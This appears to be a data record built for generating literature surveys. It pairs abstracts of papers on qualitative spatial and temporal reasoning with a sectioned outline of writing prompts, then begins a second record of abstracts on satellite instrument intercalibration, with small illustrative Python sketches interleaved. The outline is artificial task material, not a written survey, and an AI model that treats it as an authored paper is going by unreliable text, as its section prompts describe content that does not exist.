A number of other topics are dealt with: a decision procedure based on quantifier elimination is given for a large class of formulae within a 1st-order topological language; reasoning mechanisms based on the composition of spatial relations are studied; the non-topological property of convexity is examined both from the point of view of its 1st-order characterisation and its incorporation into a 0-order spatial logic. It is suggested that 0-order representations could be employed in a similar manner to encode other spatial concepts. --- paper_title: A Tableau Algorithm for Description Logics with Concrete Domains and General TBoxes paper_content: In order to use description logics (DLs) in an application, it is crucial to identify a DL that is sufficiently expressive to represent the relevant notions of the application domain, but for which reasoning is still decidable. Two means of expressivity required by many modern applications of DLs are concrete domains and general TBoxes. The former are used for defining concepts based on concrete qualities of their instances such as the weight, age, duration, and spatial extension. The purpose of the latter is to capture background knowledge by stating that the extension of a concept is included in the extension of another concept. Unfortunately, combining concrete domains with general TBoxes often leads to DLs for which reasoning is undecidable. In this paper, we identify a general property of concrete domains that is sufficient for proving decidability of DLs with both concrete domains and general TBoxes. We exhibit some useful concrete domains, most notably a spatial one based on the RCC-8 relations that have this property. Then, we present a tableau algorithm for reasoning in DLs equipped with concrete domains and general TBoxes. --- paper_title: PelletSpatial: A Hybrid RCC-8 and RDF/OWL Reasoning and Query Engine paper_content: In this paper, we present PelletSpatial, a qualitative spatial reasoning engine implemented on top of Pellet. PelletSpatial provides consistency checking and query answering over spatial data represented with the Region Connection Calculus (RCC). It supports all RCC-8 relations as well as standard RDF/OWL semantic relations, both represented in RDF/OWL. As such, it can answer mixed SPARQL queries over both relation types. PelletSpatial implements two RCC reasoners: (a) A reasoner based on the semantics preserving translation of RCC relations to OWL-DL class axioms and (b) a reasoner based on the RCC composition table that implements a path-consistency algorithm. We discuss the details of two implementation approaches and focus on some of their respective advantages and disadvantages. --- paper_title: Pellet: A practical OWL-DL reasoner paper_content: In this paper, we present a brief overview of Pellet: a complete OWL-DL reasoner with acceptable to very good performance, extensive middleware, and a number of unique features. Pellet is the first sound and complete OWL-DL reasoner with extensive support for reasoning with individuals (including nominal support and conjunctive query), user-defined datatypes, and debugging support for ontologies. It implements several extensions to OWL-DL including a combination formalism for OWL-DL ontologies, a non-monotonic operator, and preliminary support for OWL/Rule hybrid reasoning. Pellet is written in Java and is open source.
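PelletSpatial combines RCC constraint reasoning with OWL reasoning. To make the region-calculus side tangible, here is a minimal sketch that classifies the qualitative relation between two concrete regions given as finite sets of grid cells; the helper names are mine, and RCC-5 is used rather than RCC-8 to avoid the boundary bookkeeping that the tangential/non-tangential distinctions would require.

```python
# Illustrative only: RCC-5 base relation between two regions given as cell sets.
def rcc5(a: set, b: set) -> str:
    if a == b:
        return 'EQ'            # identical regions
    if not (a & b):
        return 'DR'            # discrete (no common part)
    if a < b:
        return 'PP'            # a is a proper part of b
    if b < a:
        return 'PPi'           # b is a proper part of a
    return 'PO'                # partial overlap

box = lambda x0, y0, x1, y1: {(x, y) for x in range(x0, x1) for y in range(y0, y1)}
print(rcc5(box(0, 0, 4, 4), box(2, 2, 6, 6)))   # PO
print(rcc5(box(1, 1, 3, 3), box(0, 0, 4, 4)))   # PP
print(rcc5(box(0, 0, 2, 2), box(5, 5, 7, 7)))   # DR
```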
--- paper_title: The description logic handbook: theory, implementation, and applications paper_content: Description logics are embodied in several knowledge-based systems and are used to develop various real-life applications. Now in paperback, The Description Logic Handbook provides a thorough account of the subject, covering all aspects of research in this field, namely: theory, implementation, and applications. Its appeal will be broad, ranging from more theoretically oriented readers, to those with more practically oriented interests who need a sound and modern understanding of knowledge representation systems based on description logics. As well as general revision throughout the book, this new edition presents a new chapter on ontology languages for the semantic web, an area of great importance for the future development of the web. In sum, the book will serve as a unique resource for the subject, and can also be used for self-study or as a reference for knowledge representation and artificial intelligence courses. --- paper_title: SOWL: a framework for handling spatio-temporal information in OWL 2.0 paper_content: We propose SOWL, an ontology for representing and reasoning over spatio-temporal information in OWL. Building upon well established standards of the semantic web (OWL 2.0, SWRL) SOWL enables representation of static as well as of dynamic information based on the 4D-fluents (or, equivalently, on the N-ary) approach. Both RCC- 8 topological and cone-shaped directional relations are integrated in SOWL. Representing both qualitative temporal and spatial information (i.e., information whose temporal or spatial extents are unknown such as "left-of" for spatial and "before" for temporal relations) in addition to quantitative information (i.e., where temporal and spatial information is defined precisely) is a distinctive feature of SOWL. The SOWL reasoner is capable of inferring new relations and checking their consistency, while retaining soundness, completeness, and tractability over the supported sets of relations. --- paper_title: Logic-based robot control in highly dynamic domains paper_content: In this paper, we present the robot programming and planning language Readylog, a Golog dialect, which was developed to support the decision making of robots acting in dynamic real-time domains, such as robotic soccer. The formal framework of Readylog, which is based on the situation calculus, features imperative control structures such as loops and procedures, allows for decision-theoretic planning, and accounts for a continuously changing world. We developed high-level controllers in Readylog for our soccer robots in RoboCup's Middle-size league, but also for service robots and for autonomous agents in interactive computer games. For a successful deployment of Readylog on a real robot it is also important to account for the control problem as a whole, integrating the low-level control of the robot (such as localization, navigation, and object recognition) with the logic-based high-level control. In doing so, our approach can be seen as a step towards bridging the gap between the fields of robotics and knowledge representation. --- paper_title: Modelling Dynamic Spatial Systems in the Situation Calculus paper_content: Abstract We propose and systematically formalise a dynamical spatial systems approach for the modelling of changing spatial environments. 
The formalisation adheres to the semantics of the situation calculus and includes a systematic account of key aspects that are necessary to realize a domain-independent qualitative spatial theory that may be utilised across diverse application domains. The spatial theory is primarily derivable from the all-pervasive generic notion of “qualitative spatial calculi” that are representative of differing aspects of space. In addition, the theory also includes aspects, both ontological and phenomenal in nature, that are considered inherent in dynamic spatial systems. Foundational to the formalisation is a causal theory that adheres to the representational and computational semantics of the situation calculus. This foundational theory provides the necessary (general) mechanism required to represent and reason about changing spatial environments and also includes an account of ... --- paper_title: On-Line Decision-Theoretic Golog for Unpredictable Domains paper_content: DTGolog was proposed by Boutilier et al. as an integration of decision-theoretic (DT) planning and the programming language Golog. Advantages include the ability to handle large state spaces and to limit the search space during planning with explicit programming. Soutchanski developed a version of DTGolog, where a program is executed on-line and DT planning can be applied to parts of a program only. One of the limitations is that DT planning generally cannot be applied to programs containing sensing actions. In order to deal with robotic scenarios in unpredictable domains, where certain kinds of sensing like measuring one’s own position are ubiquitous, we propose a strategy where sensing during deliberation is replaced by suitable models like computed trajectories so that DT planning remains applicable. In the paper we discuss the necessary changes to DTGolog entailed by this strategy and an application of our approach in the RoboCup domain. --- paper_title: Reasoning with Qualitative Positional Information for Domestic Domains in the Situation Calculus paper_content: In this paper, we present a thorough integration of qualitative representations and reasoning for positional information for domestic service robotics domains into our high-level robot control. In domestic settings for service robots like in the RoboCup@Home competitions, complex tasks such as “get the cup from the kitchen and bring it to the living room” or “find me this and that object in the apartment” have to be accomplished. At these competitions the robots may only be instructed by natural language. As humans use qualitative concepts such as “near” or “far”, the robot needs to cope with them, too. For our domestic robot, we use the robot programming and plan language Readylog, our variant of Golog. In previous work we extended the action language Golog, which was developed for the high-level control of agents and robots, with fuzzy set-based qualitative concepts. We now extend our framework to positional fuzzy fluents with an associated positional context called frames. With that and our underlying reasoning mechanism we can transform qualitative positional information from one context to another to account for changes in context such as the point of view or the scale. We demonstrate how qualitative positional fluents based on a fuzzy set semantics can be deployed in domestic domains and showcase how reasoning with these qualitative notions can seamlessly be applied to a fetch-and-carry task in a RoboCup@Home scenario. 
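The Readylog entry above grounds qualitative positional terms such as "near" and "far" in fuzzy sets with a frame-dependent scale. The following sketch is not the cited implementation; it only illustrates, with invented scale values and helper names, how trapezoidal membership functions can be rescaled when the frame of reference changes.

```python
# A sketch of fuzzy-set semantics for qualitative distance terms with a
# per-frame scale, so "near" in a room-sized frame differs from "near" in an
# apartment-sized frame.  All thresholds below are made up for illustration.
def trapezoid(x, a, b, c, d):
    """Membership of a trapezoidal fuzzy set with shoulders a..b and c..d."""
    if x <= a or x >= d:
        return 0.0
    if b <= x <= c:
        return 1.0
    return (x - a) / (b - a) if x < b else (d - x) / (d - c)

def distance_terms(scale):
    """Return membership functions for 'near'/'medium'/'far', scaled to a frame."""
    return {
        'near':   lambda x: trapezoid(x, -1e-9, 0.0, 0.5 * scale, 1.0 * scale),
        'medium': lambda x: trapezoid(x, 0.5 * scale, 1.0 * scale, 2.0 * scale, 3.0 * scale),
        'far':    lambda x: 1.0 - trapezoid(x, -1e-9, 0.0, 2.0 * scale, 3.0 * scale),
    }

room = distance_terms(scale=1.0)        # metres; scale values are invented
apartment = distance_terms(scale=4.0)
d = 3.0
print({t: round(f(d), 2) for t, f in room.items()})        # clearly 'far' at room scale
print({t: round(f(d), 2) for t, f in apartment.items()})   # split between 'near' and 'medium'
```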
--- paper_title: Using Maptrees to Characterize Topological Change paper_content: This paper further develops the theory of maptrees, introduced in [13]. There exist well-known methods, based upon combinatorial maps, for topologically complete representations of embeddings of connected graphs in closed surfaces. Maptrees extend these methods to provide topologically complete representations of embeddings of possibly disconnected graphs. The focus of this paper is the use of maptrees to admit fine-grained representations of topological change. The ability of maptrees to represent complex spatial processes is demonstrated through case studies involving conceptual neighborhoods and cellular processes. --- paper_title: Qualitative reasoning with directional relations paper_content: Qualitative spatial reasoning (QSR) pursues a symbolic approach to reasoning about a spatial domain. Qualitative calculi are defined to capture domain properties in relation operations, granting a relation algebraic approach to reasoning. QSR has two primary goals: providing a symbolic model for human common-sense level of reasoning and providing efficient means for reasoning. In this paper, we dismantle the hope for efficient reasoning about directional information in infinite spatial domains by showing that it is inherently hard to decide consistency of a set of constraints that represents positions in the plane by specifying directions from reference objects. We assume that these reference objects are not fixed but only constrained through directional relations themselves. Known QSR reasoning methods fail to handle this information. --- paper_title: The Mathematical Morpho-Logical View on Reasoning about Space paper_content: Qualitative reasoning about mereotopological relations has been extensively investigated, while more recently geometrical and spatio-temporal reasoning are gaining increasing attention. We propose to consider mathematical morphology operators as the inspiration for a new language and inference mechanism to reason about space. Interestingly, the proposed morpho-logic captures not only traditional mereotopological relations, but also notions of relative size and morphology. The proposed representational framework is a hybrid arrow logic theory for which we define a resolution calculus which is, to the best of our knowledge, the first such calculus for arrow logics. --- paper_title: RCC8 Is Polynomial on Networks of Bounded Treewidth paper_content: We construct an homogeneous (and ω-categorical) representation of the relation algebra RCC8, which is one of the fundamental formalisms for spatial reasoning. As a consequence we obtain that the network consistency problem for RCC8 can be solved in polynomial time for networks of bounded treewidth. --- paper_title: A Unifying Approach to Temporal Constraint Reasoning paper_content: Abstract We present a formalism, Disjunctive Linear Relations (DLRs), for reasoning about temporal constraints. DLRs subsume most of the formalisms for temporal constraint reasoning proposed in the literature and is therefore computationally expensive. We also present a restricted type of DLRs, Horn DLRs, which have a polynomial-time satisfiability problem. We prove that most approaches to tractable temporal constraint reasoning can be encoded as Horn DLRs, including the ORD-Horn algebra by Nebel and Burckert and the simple temporal constraints by Dechter et al. Thus, DLRs is a suitable unifying formalism for reasoning about temporal constraints. 
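Several of the temporal entries (ORD-Horn, DLRs) take Allen's interval algebra as their reference point. A small, self-contained helper such as the one below, with names chosen here purely for illustration, determines which of the thirteen base relations holds between two concrete intervals.

```python
# Determine Allen's base relation between two intervals (start, end), start < end.
def allen_relation(i, j):
    (a, b), (c, d) = i, j
    if b < c:  return 'before'
    if d < a:  return 'after'
    if b == c: return 'meets'
    if d == a: return 'met-by'
    if a == c and b == d: return 'equal'
    if a == c: return 'starts' if b < d else 'started-by'
    if b == d: return 'finishes' if a > c else 'finished-by'
    if c < a and b < d: return 'during'
    if a < c and d < b: return 'contains'
    return 'overlaps' if a < c else 'overlapped-by'

print(allen_relation((1, 3), (3, 5)))   # meets
print(allen_relation((1, 6), (2, 4)))   # contains
print(allen_relation((1, 4), (2, 6)))   # overlaps
```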
--- paper_title: Qualitative spatial and temporal reasoning with AND/OR linear programming paper_content: This paper explores the use of generalized linear programming techniques to tackle two long-standing problems in qualitative spatio-temporal reasoning: Using LP as a unifying basis for reasoning, one can jointly reason about relations from different qualitative calculi. Also, concrete entities (fixed points, regions fixed in shape and/or position, etc.) can be mixed with free variables. Both features are important for applications but cannot be handled by existing techniques. In this paper we discuss properties of encoding constraint problems involving spatial and temporal relations. We advocate the use of AND/OR graphs to facilitate efficient reasoning and we show feasibility of our approach. --- paper_title: A much better polynomial time approximation of consistency in the LR calculus paper_content: In the area of qualitative spatial reasoning, the LR calculus (a refinement of Ligozat's flip-flop calculus) is a quite simple constraint calculus that forms the core of several orientation calculi like the Dipole calculi and the OPRA1 calculus by introducing the left-right-dichotomy. For many qualitative spatial calculi, algebraic closure is applied as the standard polynomial time “decision” procedure. For a long time it was believed that this can decide the consistency of scenarios of the LR calculus. However, in [8] it was shown that algebraic closure is a bad approximation of consistency for LR scenarios: scenarios in the base relations “Left” and “Right” are always algebraically closed, no matter if those scenarios are consistent or not. So algebraic closure is completely useless here. Furthermore, in [15] it was proved that the consistency problem for any calculus with relative orientation containing the relations “Left” and “Right” is NP-hard. In this paper we propose a new and better polynomial time approximation procedure for this NP-hard problem. It is based on the angles of triangles in the Euclidean plane. LR scenarios are translated to sets of linear inequalities over the real numbers. We evaluate the quality of this procedure by comparing it both to the old approximation using algebraic closure and to the (exact but exponential time) Buchberger algorithm for Gröbner bases (used as a decision method). --- paper_title: StarVars — Effective Reasoning about Relative Directions ∗ paper_content: Relative direction information is very commonly used. Observers typically describe their environment by specifying the relative directions in which they see other objects or other people from their point of view. Or they receive navigation instructions with respect to their point of view, for example, turn left at the next intersection. However, it is surprisingly hard to integrate relative direction information obtained from different observers, and to reconstruct a model of the environment or the locations of the observers based on this information. Despite intensive research, there is currently no algorithm that can effectively integrate this information: this problem is NP-hard, but not known to be in NP, even if we only use left and right relations. In this paper we present a novel qualitative representation, StarVars, that can solve these problems. It is an extension of the STAR calculus [Renz and Mitra, 2004] by a VARiable interpretation of the orientation of observers.
We show that reasoning in StarVars is in NP and present the first algorithm that allows us to effectively integrate relative direction information from different observers. --- paper_title: Generating approximate region boundaries from heterogeneous spatial information: An evolutionary approach paper_content: Spatial information takes different forms in different applications, ranging from accurate coordinates in geographic information systems to the qualitative abstractions that are used in artificial intelligence and spatial cognition. As a result, existing spatial information processing techniques tend to be tailored towards one type of spatial information, and cannot readily be extended to cope with the heterogeneity of spatial information that often arises in practice. In applications such as geographic information retrieval, on the other hand, approximate boundaries of spatial regions need to be constructed, using whatever spatial information that can be obtained. Motivated by this observation, we propose a novel methodology for generating spatial scenarios that are compatible with available knowledge. By suitably discretizing space, this task is translated to a combinatorial optimization problem, which is solved using a hybridization of two well-known meta-heuristics: genetic algorithms and ant colony optimization. What results is a flexible method that can cope with both quantitative and qualitative information, and can easily be adapted to the specific needs of specific applications. Experiments with geographic data demonstrate the potential of the approach. --- paper_title: – Mastering Left and Right – Different Approaches to a Problem That Is Not Straight Forward paper_content: Reasoning over spatial descriptions involving relations that can be described as left, right and inline has been studied extensively during the last two decades. While the fundamental nature of these relations makes reasoning about them applicable to a number of interesting problems, it also makes reasoning about them computationally hard. The key question of whether a given description using these relations can be realized is as hard as deciding satisfiability in the existential theory of the reals. In this paper we summarize the semi-decision procedures proposed so far and present the results of a random benchmark illustrating the relative effectiveness and efficiency of these procedures. --- paper_title: Here, there, but not everywhere: an extended framework for qualitative constraint satisfaction paper_content: Dealing with spatial and temporal knowledge is an indispensable part of almost all aspects of human activities. The qualitative approach to spatial and temporal reasoning (QSTR) provides a promising framework for spatial and temporal knowledge representation and reasoning. QSTR typically represents spatial/temporal knowledge in terms of qualitative relations (e.g., to the east of, after), and reasons with the knowledge by solving qualitative constraints. When formulating a qualitative constraint satisfaction problem (CSP), it is usually assumed that each variable could be "here, there and everywhere2." Practical applications e.g. urban planning, however, often require a variable taking values from a certain finite subset of the universe, i.e. require it to be 'here or there'. This paper extends the classic framework of qualitative constraint satisfaction by allowing variables taking values from finite domains. 
The computational complexity of this extended consistency problem is examined for five most important qualitative calculi, viz. Point Algebra, Interval Algebra, Cardinal Relation Algebra, RCC-5, and RCC-8. We show that the extended consistency problem remains in NP, but when only basic constraints are considered, the extended consistency problem for each calculus except Point Algebra is already NP-hard. --- paper_title: CLP(QS): a declarative spatial reasoning framework paper_content: We propose CLP(QS), a declarative spatial reasoning framework capable of representing and reasoning about high-level, qualitative spatial knowledge about the world. We systematically formalize and implement the semantics of a range of qualitative spatial calculi using a system of non-linear polynomial equations in the context of a classical constraint logic programming framework. Whereas CLP(QS) is a general framework, we demonstrate its applicability for the domain of Computer Aided Architecture Design. With CLP(QS) serving as a prototype, we position declarative spatial reasoning as a general paradigm open to other formalizations, reinterpretations, and extensions. We argue that the accessibility of qualitative spatial representation and reasoning mechanisms via the medium of high-level, logic-based formalizations is crucial for their utility toward solving real-world problems. ---
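The landmark papers and CLP(QS) both stress that in practice variables often range over finite sets of candidate locations. Under that assumption, LR-style left/right constraints can be decided by plain enumeration, as in the following sketch; the toy data and helper names are mine.

```python
# Brute-force check of left/right constraints when each variable has a finite
# domain of candidate points ("here or there, but not everywhere").
from itertools import product

def side(p, q, r):
    """'l' if r lies left of the directed line p->q, 'r' if right, 'i' if inline."""
    cross = (q[0] - p[0]) * (r[1] - p[1]) - (q[1] - p[1]) * (r[0] - p[0])
    return 'l' if cross > 0 else 'r' if cross < 0 else 'i'

def solutions(domains, constraints):
    """domains: list of candidate-point lists; constraints: (i, j, k, rel) meaning
    point k must lie on side <rel> of the directed line from point i to point j."""
    for assignment in product(*domains):
        if all(side(assignment[i], assignment[j], assignment[k]) == rel
               for i, j, k, rel in constraints):
            yield assignment

domains = [[(0, 0)],                     # a fixed landmark
           [(4, 0)],                     # another landmark
           [(2, 1), (2, -1), (2, 0)]]    # a variable restricted to three sites
print(list(solutions(domains, [(0, 1, 2, 'l')])))   # [((0, 0), (4, 0), (2, 1))]
```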
Title: A Survey of Qualitative Spatial and Temporal Calculi: Algebraic and Computational Properties Section 1: INTRODUCTION Description 1: Write about the importance of spatial and temporal knowledge across various knowledge-based systems, the focus on qualitative representations, and provide an overview of what the paper covers. Section 2: Demarcation of Scope and Contribution Description 2: Highlight the target audience, the scope of the survey, and the specific focus areas of qualitative calculi and their properties. Section 3: WHAT IS QUALITATIVE SPATIAL AND TEMPORAL REASONING Description 3: Explain the reasoning problems that QSTR deals with and provide a characterization of QSTR. Section 4: A General Definition of QSTR Description 4: Present a formal definition of QSTR, including the use of relational languages to represent and manipulate spatial and temporal knowledge. Section 5: Taxonomy of Constraint-Based Reasoning Tasks Description 5: Provide an overview of different reasoning tasks associated with QSTR, categorizing them using a taxonomy. Section 6: QUALITATIVE SPATIAL AND TEMPORAL CALCULI FOR DOMAIN REPRESENTATIONS Description 6: Survey the fundamental construct of qualitative calculi, discussing their minimal requirements and relevance for spatial and temporal representation. Section 7: Requirements to Qualitative Spatial and Temporal Calculi Description 7: Define the minimal requirements for qualitative calculi, including notions like partition schemes, identity, and converse. Section 8: Spatial and Temporal Reasoning Description 8: Discuss the role of qualitative constraint satisfaction problems (QCSPs) in spatial and temporal reasoning and introduce k-consistency. Section 9: Tools to Facilitate Qualitative Reasoning Description 9: List various tools and systems that support qualitative reasoning, including their specific functionalities. Section 10: Existing Qualitative Spatial and Temporal Calculi Description 10: Provide an overview of the existing qualitative calculi, referencing important tables and figures that help categorize them. Section 11: ALGEBRAIC PROPERTIES OF SPATIAL AND TEMPORAL CALCULI Description 11: Explain the algebraic properties of qualitative calculi, their importance, and how they relate to reasoning optimizations. Section 12: The Notion of a Relation Algebra Description 12: Define relation algebras and discuss their axioms relevant to the operations involved in qualitative calculi. Section 13: Discussion of the Axioms Description 13: Elaborate on the relevance and implications of the axioms for spatial and temporal representation and reasoning. Section 14: Prerequisites for Being a Relation Algebra Description 14: Discuss the necessary properties for a qualitative calculus to function as a relation algebra. Section 15: Algebraic Properties of Existing Spatial and Temporal Calculi Description 15: Analyze the algebraic properties of various existing spatial and temporal calculi and present results in a hierarchical structure. Section 16: Universal Procedure for Algebraic Closure Description 16: Introduce a universal algorithm for computing algebraic closure that is applicable across all calculi and respects all necessary axioms. Section 17: COMBINATION AND INTEGRATION Description 17: Review ways qualitative calculi can be combined with other knowledge representation languages and formalisms for enhanced expressivity. 
Section 18: Qualitative Calculi in Constraint-Based Knowledge Representation Languages Description 18: Discuss the use of qualitative calculi in constraint-based knowledge representation languages and their combinations for modeling complex knowledge. Section 19: Qualitative Relations and Classical Logics: Spatial Logics Description 19: Describe how qualitative relations can be combined with classical logics, especially spatial logics, for enriched representation and reasoning. Section 20: Qualitative Calculi and Description Logics Description 20: Explain how qualitative calculi can be integrated with description logics to describe spatial and temporal qualities in domains. Section 21: Qualitative Calculi and Situation Calculus Description 21: Address the integration of qualitative calculi with the situation calculus, highlighting their relevance for reasoning about actions and changes. Section 22: ALTERNATIVE APPROACHES Description 22: Provide an overview of alternative reasoning techniques for spatial and temporal reasoning that are not based solely on qualitative calculi. Section 23: Algebraic Topology Description 23: Discuss connections between algebraic topology and qualitative spatial reasoning, including topological invariants. Section 24: Combinatorial Geometry Description 24: Mention the importance of combinatorial structures like oriented matroid theory and their contributions to QSTR. Section 25: Graph Theoretical Approaches Description 25: Highlight the use of graph-theoretical methods to represent and reason about spatial changes based on qualitative relations. Section 26: Logic Frameworks Description 26: Explain the use of logic frameworks such as arrow logic to capture mereotopological relations and their automated reasoning potential. Section 27: Model-Theoretic and Constraint Reasoning Methods Description 27: Outline how qualitative CSPs can be reformulated as general CSPs and solved using model-theoretic methods and SAT solving. Section 28: Quantitative Methods Description 28: Describe how linear programming and quantitative methods can be utilized to decide constraint problems in spatial and temporal reasoning. Section 29: CONCLUSION AND FUTURE RESEARCH DIRECTIONS Description 29: Summarize the survey's findings and discuss potential future research directions in the field of qualitative spatial and temporal reasoning. Section 30: Beneficiaries of This Survey Description 30: Identify the primary beneficiaries of this survey and describe how different groups can utilize the information presented. Section 31: Open Problem Areas in QSTR Description 31: Highlight open problems and challenges in QSTR, suggesting areas that require further research and development. Section 32: ELECTRONIC APPENDIX Description 32: Provide information about the additional materials available in the electronic appendix, including examples, proofs, and experimental results.
Overview of Intercalibration of Satellite Instruments
6
--- paper_title: Achieving Satellite Instrument Calibration for Climate Change paper_content: For the most part, satellite observations of climate are not presently sufficiently accurate to establish a climate record that is indisputable and hence capable of determining whether and at what rate the climate is changing. Furthermore, they are insufficient for establishing a baseline for testing long-term trend predictions of climate models. Satellite observations do provide a clear picture of the relatively large signals associated with interannual climate variations such as El Nino-Southern Oscillation (ENSO), and they have also been used to diagnose gross inadequacies of climate models, such as their cloud generation schemes. However, satellite contributions to measuring long-term change have been limited and, at times, controversial, as in the case of differing atmospheric temperature trends derived from the U.S. National Oceanic and Atmospheric Administration's (NOAA) microwave radiometers. --- paper_title: Establishing the Antarctic Dome C community reference standard site towards consistent measurements from Earth observation satellites paper_content: Establishing satellite measurement consistency by using common desert sites has become increasingly more important not only for climate change detection but also for quantitative retrievals of geophysical variables in satellite applications. Using the Antarctic Dome C site (75°06′S, 123°21′E, elevation 3.2 km) for satellite radiometric calibration and validation (Cal/Val) is of great interest owing to its unique location and characteristics. The site surface is covered with uniformly distributed permanent snow, and the atmospheric effect is small and relatively constant. In this study, the long-term stability and spectral characteristics of this site are evaluated using well-calibrated satellite instruments such as the Moderate Resolution Imaging Spectroradiometer (MODIS) and Sea-viewing Wide Field-of-view Sensor (SeaWiFS). Preliminary results show that despite a few limitations, the site in general is stable in the long term, the bidirectional reflectance distribution function (BRDF) model works well, an... --- paper_title: Workshop on Strategies for Calibration and Validation of Global Change Measurements paper_content: The Committee on Environment and Natural Resources (CENR) Task Force on Observations and Data Management hosted a Global Change Calibration/Validation Workshop on May 10-12, 1995, in Arlington, Virginia. This Workshop was convened by Robert Schiffer of NASA Headquarters in Washington, D.C., for the CENR Secretariat with a view toward assessing and documenting lessons learned in the calibration and validation of large-scale, long-term data sets in land, ocean, and atmospheric research programs. The National Aeronautics and Space Administration (NASA)/Goddard Space Flight Center (GSFC) hosted the meeting on behalf of the Committee on Earth Observation Satellites (CEOS)/Working Group on Calibration/walidation, the Global Change Observing System (GCOS), and the U. S. CENR. A meeting of experts from the international scientific community was brought together to develop recommendations for calibration and validation of global change data sets taken from instrument series and across generations of instruments and technologies. Forty-nine scientists from nine countries participated. The U. S., Canada, United Kingdom, France, Germany, Japan, Switzerland, Russia, and Kenya were represented. 
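Several of these references quantify instrument-to-instrument bias from collocated observations. The toy fragment below, with entirely synthetic numbers and invented names, only illustrates the basic bookkeeping of an SNO-style comparison: average the per-collocation brightness-temperature differences and bin them by scene temperature. It is not an operational NOAA or GSICS procedure.

```python
# Toy illustration of an intersatellite difference (ISD) estimate from
# simultaneous-nadir-overpass-style collocations.  All data are synthetic.
import numpy as np

rng = np.random.default_rng(0)
truth = rng.uniform(210.0, 290.0, size=500)                      # scene brightness temps (K)
sat_a = truth + rng.normal(0.0, 0.15, size=truth.size)           # reference-like instrument
sat_b = truth + 0.35 + rng.normal(0.0, 0.20, size=truth.size)    # instrument with 0.35 K warm bias

isd = sat_b - sat_a                                   # per-collocation difference
bias = isd.mean()
stderr = isd.std(ddof=1) / np.sqrt(isd.size)          # uncertainty of the mean
print(f"estimated bias: {bias:+.3f} K  (+/- {stderr:.3f} K)")

# Binning the differences by scene temperature exposes scene-dependent biases,
# the kind of structure the HIRS comparison in this reference set discusses.
bins = np.linspace(210, 290, 9)
idx = np.digitize(truth, bins)
for k in range(1, len(bins)):
    sel = idx == k
    if sel.any():
        print(f"{bins[k-1]:5.0f}-{bins[k]:5.0f} K: {isd[sel].mean():+.3f} K")
```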
--- paper_title: The Global Space-Based Inter-Calibration System paper_content: The Global Space-based Inter-Calibration System (GSICS) is a new international program to assure the comparability of satellite measurements taken at different times and locations by different instruments operated by different satellite agencies. Sponsored by the World Meteorological Organization and the Coordination Group for Meteorological Satellites, GSICS will intercalibrate the instruments of the international constellation of operational low-earth-orbiting (LEO) and geostationary earth-orbiting (GEO) environmental satellites and tie these to common reference standards. The intercomparability of the observations will result in more accurate measurements for assimilation in numerical weather prediction models, construction of more reliable climate data records, and progress toward achieving the societal goals of the Global Earth Observation System of Systems. GSICS includes globally coordinated activities for prelaunch instrument characterization, onboard routine calibration, sensor intercomparison of... --- paper_title: Satellite Instrument Calibration for Measuring Global Climate Change paper_content: Measuring the small changes associated with long-term global climate change from space is a daunting task. The satellite instruments must be capable of observing atmospheric and surface temperature trends as small as 0.1°C decade−1, ozone changes as little as 1% decade−1, and variations in the sun's output as tiny as 0.1% decade−1. To address these problems and recommend directions for improvements in satellite instrument calibration, the National Institute of Standards and Technology (NIST), National Polar-orbiting Operational Environmental Satellite System–Integrated Program Office (NPOESS-IPO), National Oceanic and Atmospheric Administration (NOAA), and National Aeronautics and Space Administration (NASA) organized a workshop at the University of Maryland Inn and Conference Center, College Park, Maryland, 12–14 November 2002. Some 75 scientists participated including researchers who develop and analyze long-term datasets from satellites, experts in the field of satellite instrument calibration, and phy... --- paper_title: An overview of sensor calibration inter-comparison and applications paper_content: Long-term climate data records (CDR) are often constructed using observations made by multiple Earth observing sensors over a broad range of spectra and a large scale in both time and space. These sensors can be of the same or different types operated on the same or different platforms. They can be developed and built with different technologies and are likely operated over different time spans. It has been known that the uncertainty of climate models and data records depends not only on the calibration quality (accuracy and stability) of individual sensors, but also on their calibration consistency across instruments and platforms. Therefore, sensor calibration inter-comparison and validation have become increasingly demanding and will continue to play an important role for a better understanding of the science product quality. This paper provides an overview of different methodologies, which have been successfully applied for sensor calibration inter-comparison. Specific examples using different sensors, including MODIS, AVHRR, and ETM+, are presented to illustrate the implementation of these methodologies. 
--- paper_title: Earth observation sensor calibration using a global instrumented and automated network of test sites (GIANTS) paper_content: Calibration is critical for useful long-term data records, as well as independent data quality control. However, in the context of Earth observation sensors, post-launch calibration and the associated quality assurance perspective are far from operational. This paper explores the possibility of establishing a global instrumented and automated network of test sites (GIANTS) for post-launch radiometric calibration of Earth observation sensors. It is proposed that a small number of well-instrumented benchmark test sites and data sets for calibration be supported. A core set of sensors, measurements, and protocols would be standardized across all participating test sites and the measurement data sets would undergo identical processing at a central secretariat. The network would provide calibration information to supplement or substitute for on-board calibration, would reduce the effort required by individual agencies, and would provide consistency for cross-platform studies. Central to the GIANTS concept is the use of automation, communication, coordination, visibility, and education, all of which can be facilitated by greater use of advanced in-situ sensor and telecommunication technologies. The goal is to help ensure that the resources devoted to remote sensing calibration benefit the intended user community and facilitate the development of new calibration methodologies (research and development) and future specialists (education and training). --- paper_title: Achieving Satellite Instrument Calibration for Climate Change paper_content: For the most part, satellite observations of climate are not presently sufficiently accurate to establish a climate record that is indisputable and hence capable of determining whether and at what rate the climate is changing. Furthermore, they are insufficient for establishing a baseline for testing long-term trend predictions of climate models. Satellite observations do provide a clear picture of the relatively large signals associated with interannual climate variations such as El Nino-Southern Oscillation (ENSO), and they have also been used to diagnose gross inadequacies of climate models, such as their cloud generation schemes. However, satellite contributions to measuring long-term change have been limited and, at times, controversial, as in the case of differing atmospheric temperature trends derived from the U.S. National Oceanic and Atmospheric Administration's (NOAA) microwave radiometers. --- paper_title: Intersatellite Differences of HIRS Longwave Channels Between NOAA-14 and NOAA-15 and Between NOAA-17 and METOP-A paper_content: Intersatellite differences of the High-Resolution Infrared Radiation Sounder (HIRS) longwave channels (channels 1-12) between National Oceanic and Atmospheric Administration 14 (NOAA-14) and NOAA-15 and between NOAA-17 and METOP-A are examined. Two sets of colocated data are incorporated in the examination. One data set is obtained during periods when equator crossing times of two satellites are very close to each other, and the data set is referred to as global simultaneous nadir overpass observation (SNO). The other data set is based on multiyear polar SNOs. The examination shows that intersatellite differences (ISDs) of temperature-sounding channels from lower stratosphere to lower troposphere, i.e., channels 3-7, are correlated with their corresponding lapse rate factors. 
